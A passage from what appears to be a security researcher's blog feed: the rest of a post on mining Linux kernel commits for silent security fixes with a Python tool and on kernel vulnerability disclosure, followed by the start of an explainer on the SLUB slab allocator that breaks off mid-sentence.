<li><a href="#kernel-dev-tldr">kernel dev tl;dr</a></li>
<li><a href="#on-silent-security-fixes">on (silent) security fixes</a></li>
<li><a href="#the-plan">the plan</a></li>
</ul>
</li>
<li><a href="#lica">Lica</a></li>
<li><a href="#takeaways">Takeaways</a>
<ul>
<li><a href="#on-disclosures">On Disclosures</a></li>
</ul>
</li>
<li><a href="#conclusion">Conclusion</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="background">Background</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/02/lets_get_into_it.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="480" height="270"></figure><p>The original motivation behind this research stems from a somewhat contentious and longstanding topic of discussion amongst the Linux kernel community regarding the handling of security fixes, such as instances of &quot;silent security fixes&quot;.</p><p>First of all, to give some context to what we&apos;re talking about, let&apos;s do a quick tl;dr on kernel development and some of the terms mentioned so we&apos;re all up to speed! (feel free to skip)</p><h3 id="kernel-dev-tldr">kernel dev tl;dr</h3><p>&quot;The Linux kernel is a free and open-source, monolithic, modular, multitasking, Unix-like operating system kernel [...] Day-to-day development discussions take place on the <a href="https://en.wikipedia.org/wiki/Linux_kernel_mailing_list">Linux kernel mailing list</a> (LKML). Changes are tracked using the version control system <a href="https://en.wikipedia.org/wiki/Git">git</a>&quot; <sup><a href="https://en.wikipedia.org/wiki/Linux_kernel">[1]</a></sup></p><p>Specifically for a project using git, we can track the changes made by looking at the commits. A commit describes a set of changes made to the project by an author. If we look at projects on GitHub for example, we can see this. As of writing, the <a href="https://github.com/torvalds/linux">Linux kernel source tree</a> mirror on GitHub has 1,154,596 commits that <a href="https://github.com/torvalds/linux/commits/master">we can peruse</a>! </p><p>That&apos;s a lot of changes, right? The Linux kernel has guidelines and rules about submitting patches<sup><a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">[2]</a></sup>, but typically a commit is a logically cohesive set of changes (i.e. 
you won&apos;t see a bunch of different fixes for different parts of the kernel in one commit, I hope anyway).</p><p>All these changes are organised into releases, which you can read about over at <a href="https://www.kernel.org/category/releases.html">kernel.org</a><sup>[3]</sup>, with new mainline kernels being released every 9-10 weeks. </p><p>Important to note is the concept of <strong>backporting</strong>, whereby bug fixes introduced in the latest releases are applied to older kernel releases as well. There are several long-term maintenance (aka LTS) kernel releases, which designate support for older kernels.</p><h3 id="on-silent-security-fixes">on (silent) security fixes</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/01/shh.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="480" height="270"></figure><p>There&apos;s been lots of discussion surrounding security fixes and how they should be handled in relation to non-security fixes in the kernel, and this dialogue has understandably evolved over the years as our concept and understanding of security has too.</p><p>It&apos;s a complex topic and, to oversimplify the arguments, on one extreme of the axis you may have folks saying all fixes should be treated equally, while on the other folks would argue security fixes need to be dealt with in a specific way, highlighting the impact etc.</p><p>A recurring topic in this space is the concept of &quot;silent security fixes&quot;, where a commit fixing a potentially exploitable vulnerability <em>intentionally</em> omits information regarding the security implications/reasons behind the fix.</p><p>This has been up for debate within the community since at least 2008, as we can see from the <a href="https://seclists.org/fulldisclosure/">Full Disclosure</a> mailing list post titled &quot;<a href="https://seclists.org/fulldisclosure/2008/Jul/276">Linux&apos;s unofficial 
security-through-coverup policy</a>&quot; by <a href="https://twitter.com/spendergrsec">@spendergrsec</a>.</p><p>Now as I mentioned earlier, a lot has changed since then, and our perception of security has come a long way. However, over the years there have still been cases of, at worst, silent security fixes or, at best, inconsistency in the handling of security fixes<sup>[5][6][7][8]</sup>.</p><h3 id="the-plan">the plan</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/02/piqued_interest.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="400" height="225"></figure><p>Putting this all together, I was interested in analysing Linux kernel commits in a somewhat automated way, such that I could filter for security fixes and explore trends. </p><p>With full understanding that I&apos;m no data scientist or software engineer, I whipped up a quick (and very hacky) tool to delve around a bit and have some fun. </p><hr><ol><li><a href="https://en.wikipedia.org/wiki/Linux_kernel">https://en.wikipedia.org/wiki/Linux_kernel</a></li><li><a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">https://www.kernel.org/doc/html/latest/process/submitting-patches.html</a></li><li><a href="https://www.kernel.org/category/releases.html">https://www.kernel.org/category/releases.html</a></li><li><a href="https://github.com/hardenedlinux/grsecurity-101-tutorials/blob/master/kernel_vuln_exp.md#silent-fixes-from-linux-kernel-community--welcome-to-add-more-for-fun">https://github.com/hardenedlinux/grsecurity-101-tutorials/blob/master/kernel_vuln_exp.md#silent-fixes-from-linux-kernel-community--welcome-to-add-more-for-fun</a></li><li><a 
href="https://arstechnica.com/information-technology/2013/05/critical-linux-vulnerability-imperils-users-even-after-silent-fix/">https://arstechnica.com/information-technology/2013/05/critical-linux-vulnerability-imperils-users-even-after-silent-fix/</a></li><li><a href="https://seclists.org/oss-sec/2022/q2/134">CVE-2022-1786</a> was a UAF leading to LPE, with no mention in the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-5.10.y&amp;id=29f077d070519a88a793fbc70f1e6484dc6d9e35">fix commit</a></li><li><a href="https://seclists.org/oss-sec/2022/q4/30">CVE-2022-2602</a> was a UAF leading to LPE, with no mention in the <a href="https://github.com/torvalds/linux/commit/0091bfc81741b8d3aeb3b7ab8636f911b2de6e80">fix commit</a></li><li><a href="https://seclists.org/oss-sec/2021/q3/181">CVE-2021-41073</a> was disclosed by <a href="https://twitter.com/chompie1337">@chompie1337</a>, although the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=16c8d2df7ec0eed31b7d3b61cb13206a7fb930cc">fix commit</a> has no mention of the exploitability, and they also asked her to use a non-security-related email for the &quot;Reported-by&quot; ack (as mentioned in <a href="https://twitter.com/chompie1337">@chompie1337</a>&apos;s article <a href="https://s3.eu-west-1.amazonaws.com/www.thinkst.com/thinkstscapes/ThinkstScapes-2022-Q1-highres.pdf">here</a>)</li></ol><h2 id="lica">Lica</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2023/01/digusted_screen.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="465" height="286"><figcaption>get ready for some peak xdev-ctf-poc-tier code</figcaption></figure><p>Let&apos;s talk about the tool! I&apos;ll try to keep this brief, both for my dignity and your sanity. 
I put together this tool using Python to parse kernel commits and try to filter them for interesting security-related fixes, gathering any interesting stats along the way.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/sam4k/lica"><div class="kg-bookmark-content"><div class="kg-bookmark-title">sam4k/lica</div><div class="kg-bookmark-description">A hacky tool for analysing linux kernel commits. Contribute to sam4k/lica development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Analysing Linux Kernel Commits"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">sam4k</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/561442210ba6aa617044c346119ca7888f22fb4128acf00e6a3e55ad42927838/sam4k/lica" alt="Analysing Linux Kernel Commits"></div></a></figure><p>Thanks to the kernel patch submission guidelines<sup><a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">[1]</a></sup>, there&apos;s some level of consistency in what to expect a commit to contain, which helps us filter down the 34000 or so commits in the last 6 months to around 135 possible security fixes - neat! </p><figure class="kg-card kg-code-card"><pre><code>Commit...... | Subsystem......... | Hits.................................... | CVE............. | Reporter.......................................... | Coverage.......
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
...
331cd9461412 | btrfs              | use-after-free                           |                  | Ye Bin &lt;yebin10@huawei.com&gt;                        | linux-5.15.90, linux-5.10.165, linux-5.4.230
...
cf6531d98190 | ksmbd              | use-after-free                           |                  | zdi-disclosures@trendmicro.com # ZDI-CAN-17816     | N/A            
...          
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
Now For The Stats...
----------------------------------------------------------------------------------------------------------------------------------------------------------------------
[+] 133 commits were matched from 2448 fixes, over 33487 commits.
[+] 36 / 133 listed a reporter.
[+] 2 / 133 mentioned a CVE.
[+] Breakdown by category:
|---- UAF: 95
|---- Races: 22
|---- Generic: 15
|---- Info Leak: 10
|---- Stack Overflow: 2
...
[+] Breakdown by module:
|---- mm: 11
|---- wifi: 10
|---- drm: 8
|---- media: 6
|---- net: 5
|---- cifs: 4
|---- io_uring: 4
...</code></pre><figcaption>output for the last 6 months or so, checking for coverage in latest 5.15, 5.10, 5.4 at the time</figcaption></figure><p>Above is a sample output from Lica, analysing kernel commits over the past 180 days. Here I&apos;ve used a really basic approach of looking for fixes via keywords in the commit summary phrase and then further filtering those fixes by looking for hits in a dictionary of common bug classes/terminology, grouped by category.</p><p>A (slightly) more nuanced approach, looking at some of the &quot;silent fixes&quot; from earlier, would be to grep for typical <em>causes</em> of bug classes combined with the omission of any mention of the bug class itself. A simple example might be <code>check.*len</code> for missing length checks.</p><p>It&apos;s worth noting that while we can use a basic dictionary or even filter by specific reporters (I&apos;m looking at you, ZDI), using a bug-cause-focused dictionary (that omits security-centric terms) yields just as many results. </p><p>While this produces more false positives, I think it reiterates that a determined attacker doesn&apos;t need to just grep for &quot;buffer overflow privesc&quot; or a CVE to find potentially exploitable vulnerabilities, whether that&apos;s by manually enumerating commits or by using an approach like this that takes a few hours to put together. Which makes me wonder why we have cases such as a researcher being asked to use a non-security-related email for the &quot;Reported-by&quot; ack<sup>[2]</sup>?</p><p>Back to Lica: I also include a naive check to see if a particular kernel release has the patch, for checking older LTS kernels for backports (the <code>Coverage</code> column). There&apos;s no doubt an easier and more reliable way to do this, but hey-ho, this did the trick for now.</p><p>Anyways, I tried to make this somewhat extensible and configurable, so I&apos;ve chucked it up on GitHub in case anyone is interested in having a play with it. 
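For a flavour of this keyword/dictionary approach, here&apos;s a stripped-down, hypothetical sketch (not Lica&apos;s actual code; the categories and patterns are made up for illustration) of classifying commit subject lines:

```python
import re

# hypothetical bug-class dictionary, in the spirit of the approach described
BUG_CLASSES = {
    "UAF": [r"use[- ]after[- ]free", r"\buaf\b"],
    "Races": [r"\brace\b"],
    "Info Leak": [r"info(rmation)?[- ]leak", r"uninitiali[sz]ed"],
    "Generic": [r"out[- ]of[- ]bounds", r"overflow", r"len.*check|check.*len"],
}

def classify(subject):
    """Return the bug-class categories whose patterns hit this subject line."""
    subject = subject.lower()
    return [cat for cat, patterns in BUG_CLASSES.items()
            if any(re.search(p, subject) for p in patterns)]

assert classify("btrfs: fix use-after-free in btrfs_search_slot") == ["UAF"]
assert classify("ksmbd: add missing length check in smb2_write") == ["Generic"]
```

Swapping the security-centric terms for bug-<em>cause</em> patterns (missing checks, off-by-ones, refcount mistakes) is then just a matter of changing the dictionary.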
You&apos;ve been warned about the quality!</p><hr><ol><li><a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">https://www.kernel.org/doc/html/latest/process/submitting-patches.html</a></li><li><a href="https://seclists.org/oss-sec/2021/q3/181">CVE-2021-41073</a> was disclosed by <a href="https://twitter.com/chompie1337">@chompie1337</a>, although the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=16c8d2df7ec0eed31b7d3b61cb13206a7fb930cc">fix commit</a> has no mention of the exploitability, and they also asked her to use a non-security-related email for the &quot;Reported-by&quot; ack (as mentioned in <a href="https://twitter.com/chompie1337">@chompie1337</a>&apos;s article <a href="https://s3.eu-west-1.amazonaws.com/www.thinkst.com/thinkstscapes/ThinkstScapes-2022-Q1-highres.pdf">here</a>)</li></ol><h2 id="takeaways">Takeaways</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/02/feeling_takeaway.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="480" height="270"></figure><p>Despite not getting to spend much time fine-tuning the tool or doing some in-depth analysis, it&apos;s been a fun little project and it broaches an important discussion.</p><p>It does feel like, as a security researcher, there is still a lack of transparency and consistency in the processes and handling of security disclosures and fixes in the kernel. </p><p>Whether there&apos;s intentional omission of security-relevant information or just a difference in opinion on what constitutes relevant information, the end result is still a lack of consistency in how reported security issues are handled.</p><p>For example, I wrote about my experience disclosing a kernel vulnerability at the beginning of 2022<sup><a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">[1]</a></sup>. 
While the process was a bit convoluted for me, after getting in touch with the right folks I had no issues with communication, and the commit referenced the reporter, the CVE and the vulnerability being fixed<sup><a href="https://github.com/torvalds/linux/commit/9aa422ad326634b76309e8ff342c246800621216">[2]</a></sup>. </p><p>However, as I touched on earlier in the post, other researchers have had different experiences, and the resulting patches can vary in their security-relevant content. </p><h3 id="on-disclosures">On Disclosures</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/02/dont-make-me-go-back.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="480" height="270"></figure><p>If you want to report a kernel vulnerability, you&apos;ll typically end up staring at two pages:</p><ol><li>The official kernel documentation on &quot;Security Bugs&quot;<sup><a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">[3]</a>[4]</sup></li><li>The <code>linux-distros</code> mailing list wiki page<sup><a href="https://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists">[5]</a></sup></li></ol><p>The tl;dr here is that the kernel security team&apos;s focus is solely on finding and applying a fix for security bugs. To allocate a CVE and inform vendors of the security impact (LPE, RCE etc.), you need to coordinate with the <code>linux-distros</code> list too.</p><p>There&apos;s been a history of friction between the policies of the two bodies, with security researchers getting caught up between the two. The most recent instance was the public disclosure of CVE-2023-0179 over on oss-security<a href="https://seclists.org/oss-sec/2023/q1/22"><sup>[6]</sup></a>. </p><p>Unfortunately, I don&apos;t fully understand the root cause of the misunderstanding. 
As Solar Designer points out, this seems to stem from a policy change made to accommodate the kernel security team<sup><a href="https://www.openwall.com/lists/oss-security/2022/05/24/1">[8]</a></sup>, as part of a wider discussion on <code>linux-distros</code> policy last year<sup><a href="https://seclists.org/oss-sec/2022/q2/99">[9]</a></sup>, but I&apos;m not entirely sure which policy this disclosure broke in the kernel documentation for &quot;Security Bugs&quot;<sup><a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">[3]</a></sup>.</p><p>Beyond highlighting the work required on the part of the researcher to make sure they follow the right steps and policies, this instance also shows where this rift might end up if things carry on the way they are, with Solar Designer commenting:</p><blockquote>It may well be the last straw that will result in Linux kernel documentation getting updated so that reporters would not be instructed to contact linux-distros anymore (or would even be instructed not to?) &#xA0;On one hand, this is bad. &#xA0;On the other, everyone is tired of the inconsistencies and the drama.</blockquote><p>Solar Designer then goes on to explain a potential solution to ensure oss-security still keeps up to date with kernel security issues if things do go south:</p><blockquote>I suppose we (oss-security community?) could want to setup a crawler detecting likely security issues on Linux kernel mailing lists and among Linux kernel commits (including branches). 
&#xA0;This could detect even more issues than are being brought to linux-distros and oss-security now.</blockquote><p>While somewhat ironic given the topic of this post (not that my code is fit for scale lol), it&apos;s a shame that there&apos;s still discord regarding the handling of kernel security issues when this is a debate that&apos;s been going on for so many years at this point.</p><p>I don&apos;t have all the information or experience to suggest solutions for a decades-long pain point, but I do hope there&apos;s one out there and we can find it soon.</p><p>Transparency and consistency surrounding these processes help to encourage researchers to participate in coordinated vulnerability disclosure for kernel vulns. Having more clarity around the handling and state of security fixes should also help vendors, as well as help us as a community continue to progress with regard to our attitude and approach to security.</p><hr><ol><li><a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/</a></li><li><a href="https://github.com/torvalds/linux/commit/9aa422ad326634b76309e8ff342c246800621216">https://github.com/torvalds/linux/commit/9aa422ad326634b76309e8ff342c246800621216</a></li><li><a href="https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html">https://www.kernel.org/doc/html/latest/admin-guide/security-bugs.html</a></li><li>small note: the first result on Google for me is actually an older copy, from the 4.14 kernel, which omits some clarity found in the latest versions</li><li><a href="https://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists">https://oss-security.openwall.org/wiki/mailing-lists/distros#how-to-use-the-lists</a></li><li><a href="https://seclists.org/oss-sec/2023/q1/22">https://seclists.org/oss-sec/2023/q1/22</a></li><li><a 
href="https://www.openwall.com/lists/oss-security/2022/05/24/1">https://www.openwall.com/lists/oss-security/2022/05/24/1</a></li><li><a href="https://seclists.org/oss-sec/2022/q2/99">https://seclists.org/oss-sec/2022/q2/99</a></li><li><a href="https://seclists.org/oss-sec/2022/q4/221">https://seclists.org/oss-sec/2022/q4/221</a></li></ol><h2 id="conclusion">Conclusion</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/02/calming.gif" class="kg-image" alt="Analysing Linux Kernel Commits" loading="lazy" width="480" height="227"></figure><p>Well, this one was a bit of a change of pace for me and a step out of my comfort zone, considering I normally focus on more objective, technical subjects. That probably explains why it took so much longer to write!</p><p>Hopefully I didn&apos;t stir the pot too much; my goals for this post were to share some takeaways from a project that otherwise would have been relegated to the recycling bin, as well as shed some light on a relevant and important topic within the community.</p><p>Despite my criticism of the current status quo, I have a lot of respect for the time and effort put in by all of those involved in the Linux kernel community. </p><p>Fingers crossed this was interesting for those of you that made it this far, but don&apos;t fear, I&apos;ve got some more technical posts lined up for both kernel exploitation and internals! </p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[Linternals: The Slab Allocator]]></title><description><![CDATA[This time we&apos;re going to build on that and introduce another memory allocator found within the Linux kernel, the slab allocator, and its various flavours. 
So buckle up as we dive into the exciting world of SLABs, SLUBs and SLOBs.]]></description><link>https://sam4k.com/linternals-memory-allocators-0x02/</link><guid isPermaLink="false">6311d87a92020209c38fb7ba</guid><category><![CDATA[linternals]]></category><category><![CDATA[linux]]></category><category><![CDATA[memory]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Wed, 09 Nov 2022 15:04:00 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/09/linternals.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/09/linternals.gif" alt="Linternals: The Slab Allocator"><p>The monthly blog schedule has gone somewhat awry, but fear not, today we&apos;re diving back into our Linternals series on memory allocators!</p><p>I know it&apos;s been a while, I&apos;ve been sidetracked with the new job and some cool personal projects, so let&apos;s quickly highlight what we covered <a href="https://sam4k.com/linternals-memory-allocators-part-1">last time</a>:</p><ul><li>what we mean by memory allocators</li><li>key memory concepts such as pages, page frames, nodes and zones</li><li>piecing this together to explain the underlying allocator used by the Linux kernel, the buddy (or page) allocator, as well as touching on its API, pros and cons</li></ul><p>This time we&apos;re going to build on that and introduce another memory allocator found within the Linux kernel, the slab allocator, and its various flavours. So buckle up as we dive into the exciting world of SLABs, SLUBs and SLOBs.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/10/what_you_said-makes_no_sense.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="500" height="201"></figure><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#0x03-the-slab-allocator">0x03 The Slab Allocator</a>
<ul>
<li><a href="#the-basics">The Basics</a></li>
<li><a href="#data-structures">Data Structures</a>
<ul>
<li><a href="#struct-kmemcache">struct kmem_cache</a></li>
<li><a href="#struct-kmemcachecpu">struct kmem_cache_cpu</a></li>
<li><a href="#struct-kmemcachenode">struct kmem_cache_node</a></li>
<li><a href="#struct-slab">struct slab</a></li>
<li><a href="#wrap-up">Wrap-up</a></li>
</ul>
</li>
<li><a href="#the-api">The API</a>
<ul>
<li><a href="#kmalloc-kfree">kmalloc &amp; kfree</a></li>
<li><a href="#kmemcachecreate">kmem_cache_create</a></li>
<li><a href="#kmemcachealloc">kmem_cache_alloc</a></li>
<li><a href="#slab-aliases">slab aliases</a></li>
</ul>
</li>
<li><a href="#seeing-it-in-action">Seeing It In Action</a>
<ul>
<li><a href="#procslabinfo">/proc/slabinfo</a></li>
<li><a href="#slabtop">slabtop</a></li>
<li><a href="#slabinfo">slabinfo</a></li>
<li><a href="#debugging">debugging</a></li>
<li><a href="#slxbtrace-ebpf">slxbtrace (ebpf)</a></li>
</ul>
</li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="0x03-the-slab-allocator">0x03 The Slab Allocator</h2><p>The slab allocator is another memory allocator used by the Linux kernel and, as we touched on last time, &quot;sits on top of the buddy allocator&quot;.</p><p>What I mean by this is that while the slab allocator is another kernel memory allocator, it doesn&apos;t replace the buddy allocator. Instead it introduces a new API and features for kernel developers (which we&apos;ll cover soon), but under the hood it uses the buddy allocator too.</p><p>So why use the slab allocator? Well, last time we touched on some of the issues and drawbacks with the buddy allocator. The purpose of the slab allocator is to<sup><a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">[1]</a></sup>:</p><ul><li>reduce internal fragmentation,</li><li>cache commonly used objects,</li><li>better utilise the hardware cache by aligning objects to the L1 or L2 caches</li></ul><p>So while the buddy allocator excels at allocating large chunks of physically contiguous memory, the slab allocator provides better performance to kernel developers for smaller and more common allocations (which happen more often than you might think!).</p><p>Before we dive into some more detail and explain how the kernel&apos;s slab allocator achieves this, I should highlight that the term &quot;slab allocator&quot; refers to a generic memory management implementation. </p><p>The Linux kernel actually has three such implementations: SLAB<sup>[2]</sup>, SLUB and SLOB. SLUB is what you&apos;re likely to see on modern desktops and servers<sup>[3]</sup>, so <strong>we&apos;ll be focusing on this implementation</strong> throughout this post, but I&apos;ll touch on the others later. 
</p><p>If you&apos;re interested in its origins, slab allocation was first introduced by Jeff Bonwick back in the 90&apos;s and you can read his paper &quot;The Slab Allocator: An Object-Caching Kernel Memory Allocator&quot; over on USENIX.<sup><a href="http://www.usenix.org/publications/library/proceedings/bos94/full_papers/bonwick.ps">[4]</a> [5]</sup></p><hr><ol><li><a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">https://www.kernel.org/doc/gorman/html/understand/understand011.html</a></li><li>Note that &quot;slab allocator&quot; != &quot;slab&quot; != &quot;SLAB&quot;, confusing ik</li><li>SLUB has been the default since 2.6.23 (~2008), so by likely I mean <strong><em>very likely</em></strong></li><li><a href="https://www.usenix.org/biblio-4248">http://www.usenix.org/publications/library/proceedings/bos94/full_papers/bonwick.ps</a></li><li>Thanks <a href="https://infosec.exchange/web/@bsmaalders@mas.to">@bsmaalders@mas.to</a> for the reminder to include this here :) </li></ol><h3 id="the-basics">The Basics</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/10/let_us_begin.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="200"></figure><p>At a high level, there&apos;s 3 main parts to the SLUB allocator: <strong>caches</strong>, <strong>slabs</strong> and <strong>objects</strong>.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/10/simple_cache.png" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="551" height="221"></figure><p>As we can see, these form a pretty straightforward hierarchy. <strong>Objects</strong> (i.e. 
stuff being allocated by the kernel) of a particular type or size are organised into <strong>caches</strong>.</p><p><strong>Objects</strong> belonging to a <strong>cache</strong> are further grouped into <strong>slabs</strong>,<strong> </strong>which will be of a fixed size and contain a fixed number of <strong>objects.</strong> </p><p><strong>Objects</strong> in this context are just allocations of a particular size. For example, when a process opens a <code>seq_file</code><sup><a href="https://www.kernel.org/doc/html/latest/filesystems/seq_file.html">[1]</a></sup> in Linux, the kernel will allocate space for <code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/seq_file.h#L32">struct seq_operations</a></code> using the slab allocator API. This will be a 32-byte object. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/10/simple_cache_meta-2.png" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="859" height="251" srcset="https://sam4k.com/content/images/size/w600/2022/10/simple_cache_meta-2.png 600w, https://sam4k.com/content/images/2022/10/simple_cache_meta-2.png 859w" sizes="(min-width: 720px) 720px"></figure><p>Among other things, the cache will keep tabs on which slabs are full, which slabs are partially full and which slabs are empty. Free objects within a slab form a linked list, with each free object pointing to the next free object within that slab.</p><p>So when the kernel wants to make an allocation via the SLUB allocator, it will find the right cache (depending on type/size) and then find a partial slab to allocate that object from.</p><p>If there are no partial or free slabs, the SLUB allocator will allocate some new slabs via the buddy allocator. Yep, there it is, we&apos;re full circle now. 
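To make the freelist bookkeeping concrete, here&apos;s a toy model of a single slab. This is illustrative only: in real SLUB the next-free pointer lives inside the free object itself (and is obfuscated on hardened configs), rather than in a side array as here.

```python
class ToySlab:
    """Toy model of one slab: free objects form a linked list (freelist)."""

    def __init__(self, nr_objects):
        # next_free[i] = index of the next free object after i (None = end)
        self.next_free = list(range(1, nr_objects)) + [None]
        self.freelist = 0  # head of the freelist: first free object index

    def alloc(self):
        if self.freelist is None:
            return None  # slab is full; SLUB would move on to another slab
        obj, self.freelist = self.freelist, self.next_free[self.freelist]
        return obj

    def free(self, obj):
        # push the object back onto the head of the freelist
        self.next_free[obj], self.freelist = self.freelist, obj

slab = ToySlab(4)
first = slab.alloc()
slab.alloc()
slab.free(first)
assert slab.alloc() == first  # freed object comes straight back (LIFO)
```

That last assertion is why use-after-free exploitation cares about slabs so much: the most recently freed object of a given size is typically the next one handed out.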
The slabs themselves are allocated and freed using the buddy allocator we touched on last time.</p><p>Knowing this we can deduce that each slab is at least <code>PAGE_SIZE</code> bytes and is physically contiguous; we&apos;ll touch more on the details in a bit!</p><hr><ol><li><a href="https://www.kernel.org/doc/html/latest/filesystems/seq_file.html">https://www.kernel.org/doc/html/latest/filesystems/seq_file.html</a></li></ol><h3 id="data-structures">Data Structures</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/10/about_to_get_real.gif" class="kg-image" alt="Linternals: The Slab Allocator" loading="lazy" width="480" height="270"></figure><p>In the last section we covered slab allocator 101 - a simplified overview of caches, slabs and objects. Surprise, surprise: the kernel implementation is a tad more complex!</p><p>I think the approach I&apos;ll take here is to just dive right into the data structures behind the SLUB implementation and we&apos;ll expand from there and see how it goes?!</p><p>So let&apos;s give a quick overview of some of the kernel data structures we&apos;re interested in when looking at the SLUB implementation:</p><ul><li><code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L90">struct kmem_cache</a></code>: represents a specific cache of objects, storing all the metadata and info necessary for managing the cache</li><li><code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L48">struct kmem_cache_cpu</a></code>: this is a per-cpu structure which represents the &quot;active&quot; slab for a particular <code>kmem_cache</code> on that CPU (I&apos;ll explain this soon, dw!)</li><li><code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L741">struct kmem_cache_node</a></code>: this is a per-node (NUMA node) structure which tracks the partial and full slabs for a particular <code>kmem_cache</code> on that node that aren&apos;t 
currently &quot;active&quot;</li><li><code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L9">struct slab</a></code>: this structure, as you probably guessed, represents an individual slab and was introduced in 5.17<sup><a href="https://lwn.net/Articles/881039/">[1]</a></sup> (previously this information would be accessed directly from <code><a href="https://elixir.bootlin.com/linux/v5.17/source/include/linux/mm_types.h#L72">struct page</a></code>, but more on that soon!)</li></ul><h4 id="struct-kmemcache">struct kmem_cache</h4><figure class="kg-card kg-code-card"><pre><code class="language-C">struct kmem_cache {
	struct kmem_cache_cpu __percpu *cpu_slab;
	slab_flags_t flags;
	unsigned long min_partial;
	unsigned int size;
	unsigned int object_size;
	struct reciprocal_value reciprocal_size;
	unsigned int offset;	
#ifdef CONFIG_SLUB_CPU_PARTIAL
	unsigned int cpu_partial;
	unsigned int cpu_partial_slabs;
#endif
	struct kmem_cache_order_objects oo;

	/* Allocation and freeing of slabs */
	struct kmem_cache_order_objects min;
	gfp_t allocflags;	
	int refcount;		/* Refcount for slab cache destroy */
	void (*ctor)(void *);
	...
	const char *name;	/* Name (only for display!) */
	struct list_head list;	/* List of slab caches */
	...
	struct kmem_cache_node *node[MAX_NUMNODES];
};</code></pre><figcaption>comments stripped for redundancy, from <a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L90">/include/linux/slub_def.h</a></figcaption></figure><p>As you might expect from the structure that underpins the SLUB allocator&apos;s cache implementation, there&apos;s a lot to unpack here! Let&apos;s break down the key bits. </p><p><code>name</code> stores the printable name for the cache, e.g. seen in the command <code>slabtop</code> (we&apos;ll cover introspection more later). Nothing wild here.</p><p><code>object_size</code> is the size, in bytes, of the objects (read: allocations) in this cache excluding metadata. Whereas <code>size</code> is the size, in bytes, including any metadata. Typically there is no additional metadata stored in SLUB objects, so these will be the same. </p><p><code>flags</code> holds the flags that can be set when creating a <code>kmem_cache</code> object. I won&apos;t go into detail, but these can be used for debugging, error handling, alignment etc. <sup><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L23">[2]</a></sup></p><p><code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slub_def.h#L83">struct kmem_cache_order_objects</a> oo</code> is a neat word-sized structure that simply contains one member: <code>unsigned int x</code>. </p><p>This is used to store both the order<sup>[3]</sup> of the slabs in this cache (in the upper bits) and the number of objects that they can contain (in the lower bits). There are then helpers to fetch either of these values (<code><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L419">oo_objects()</a></code> and <code><a 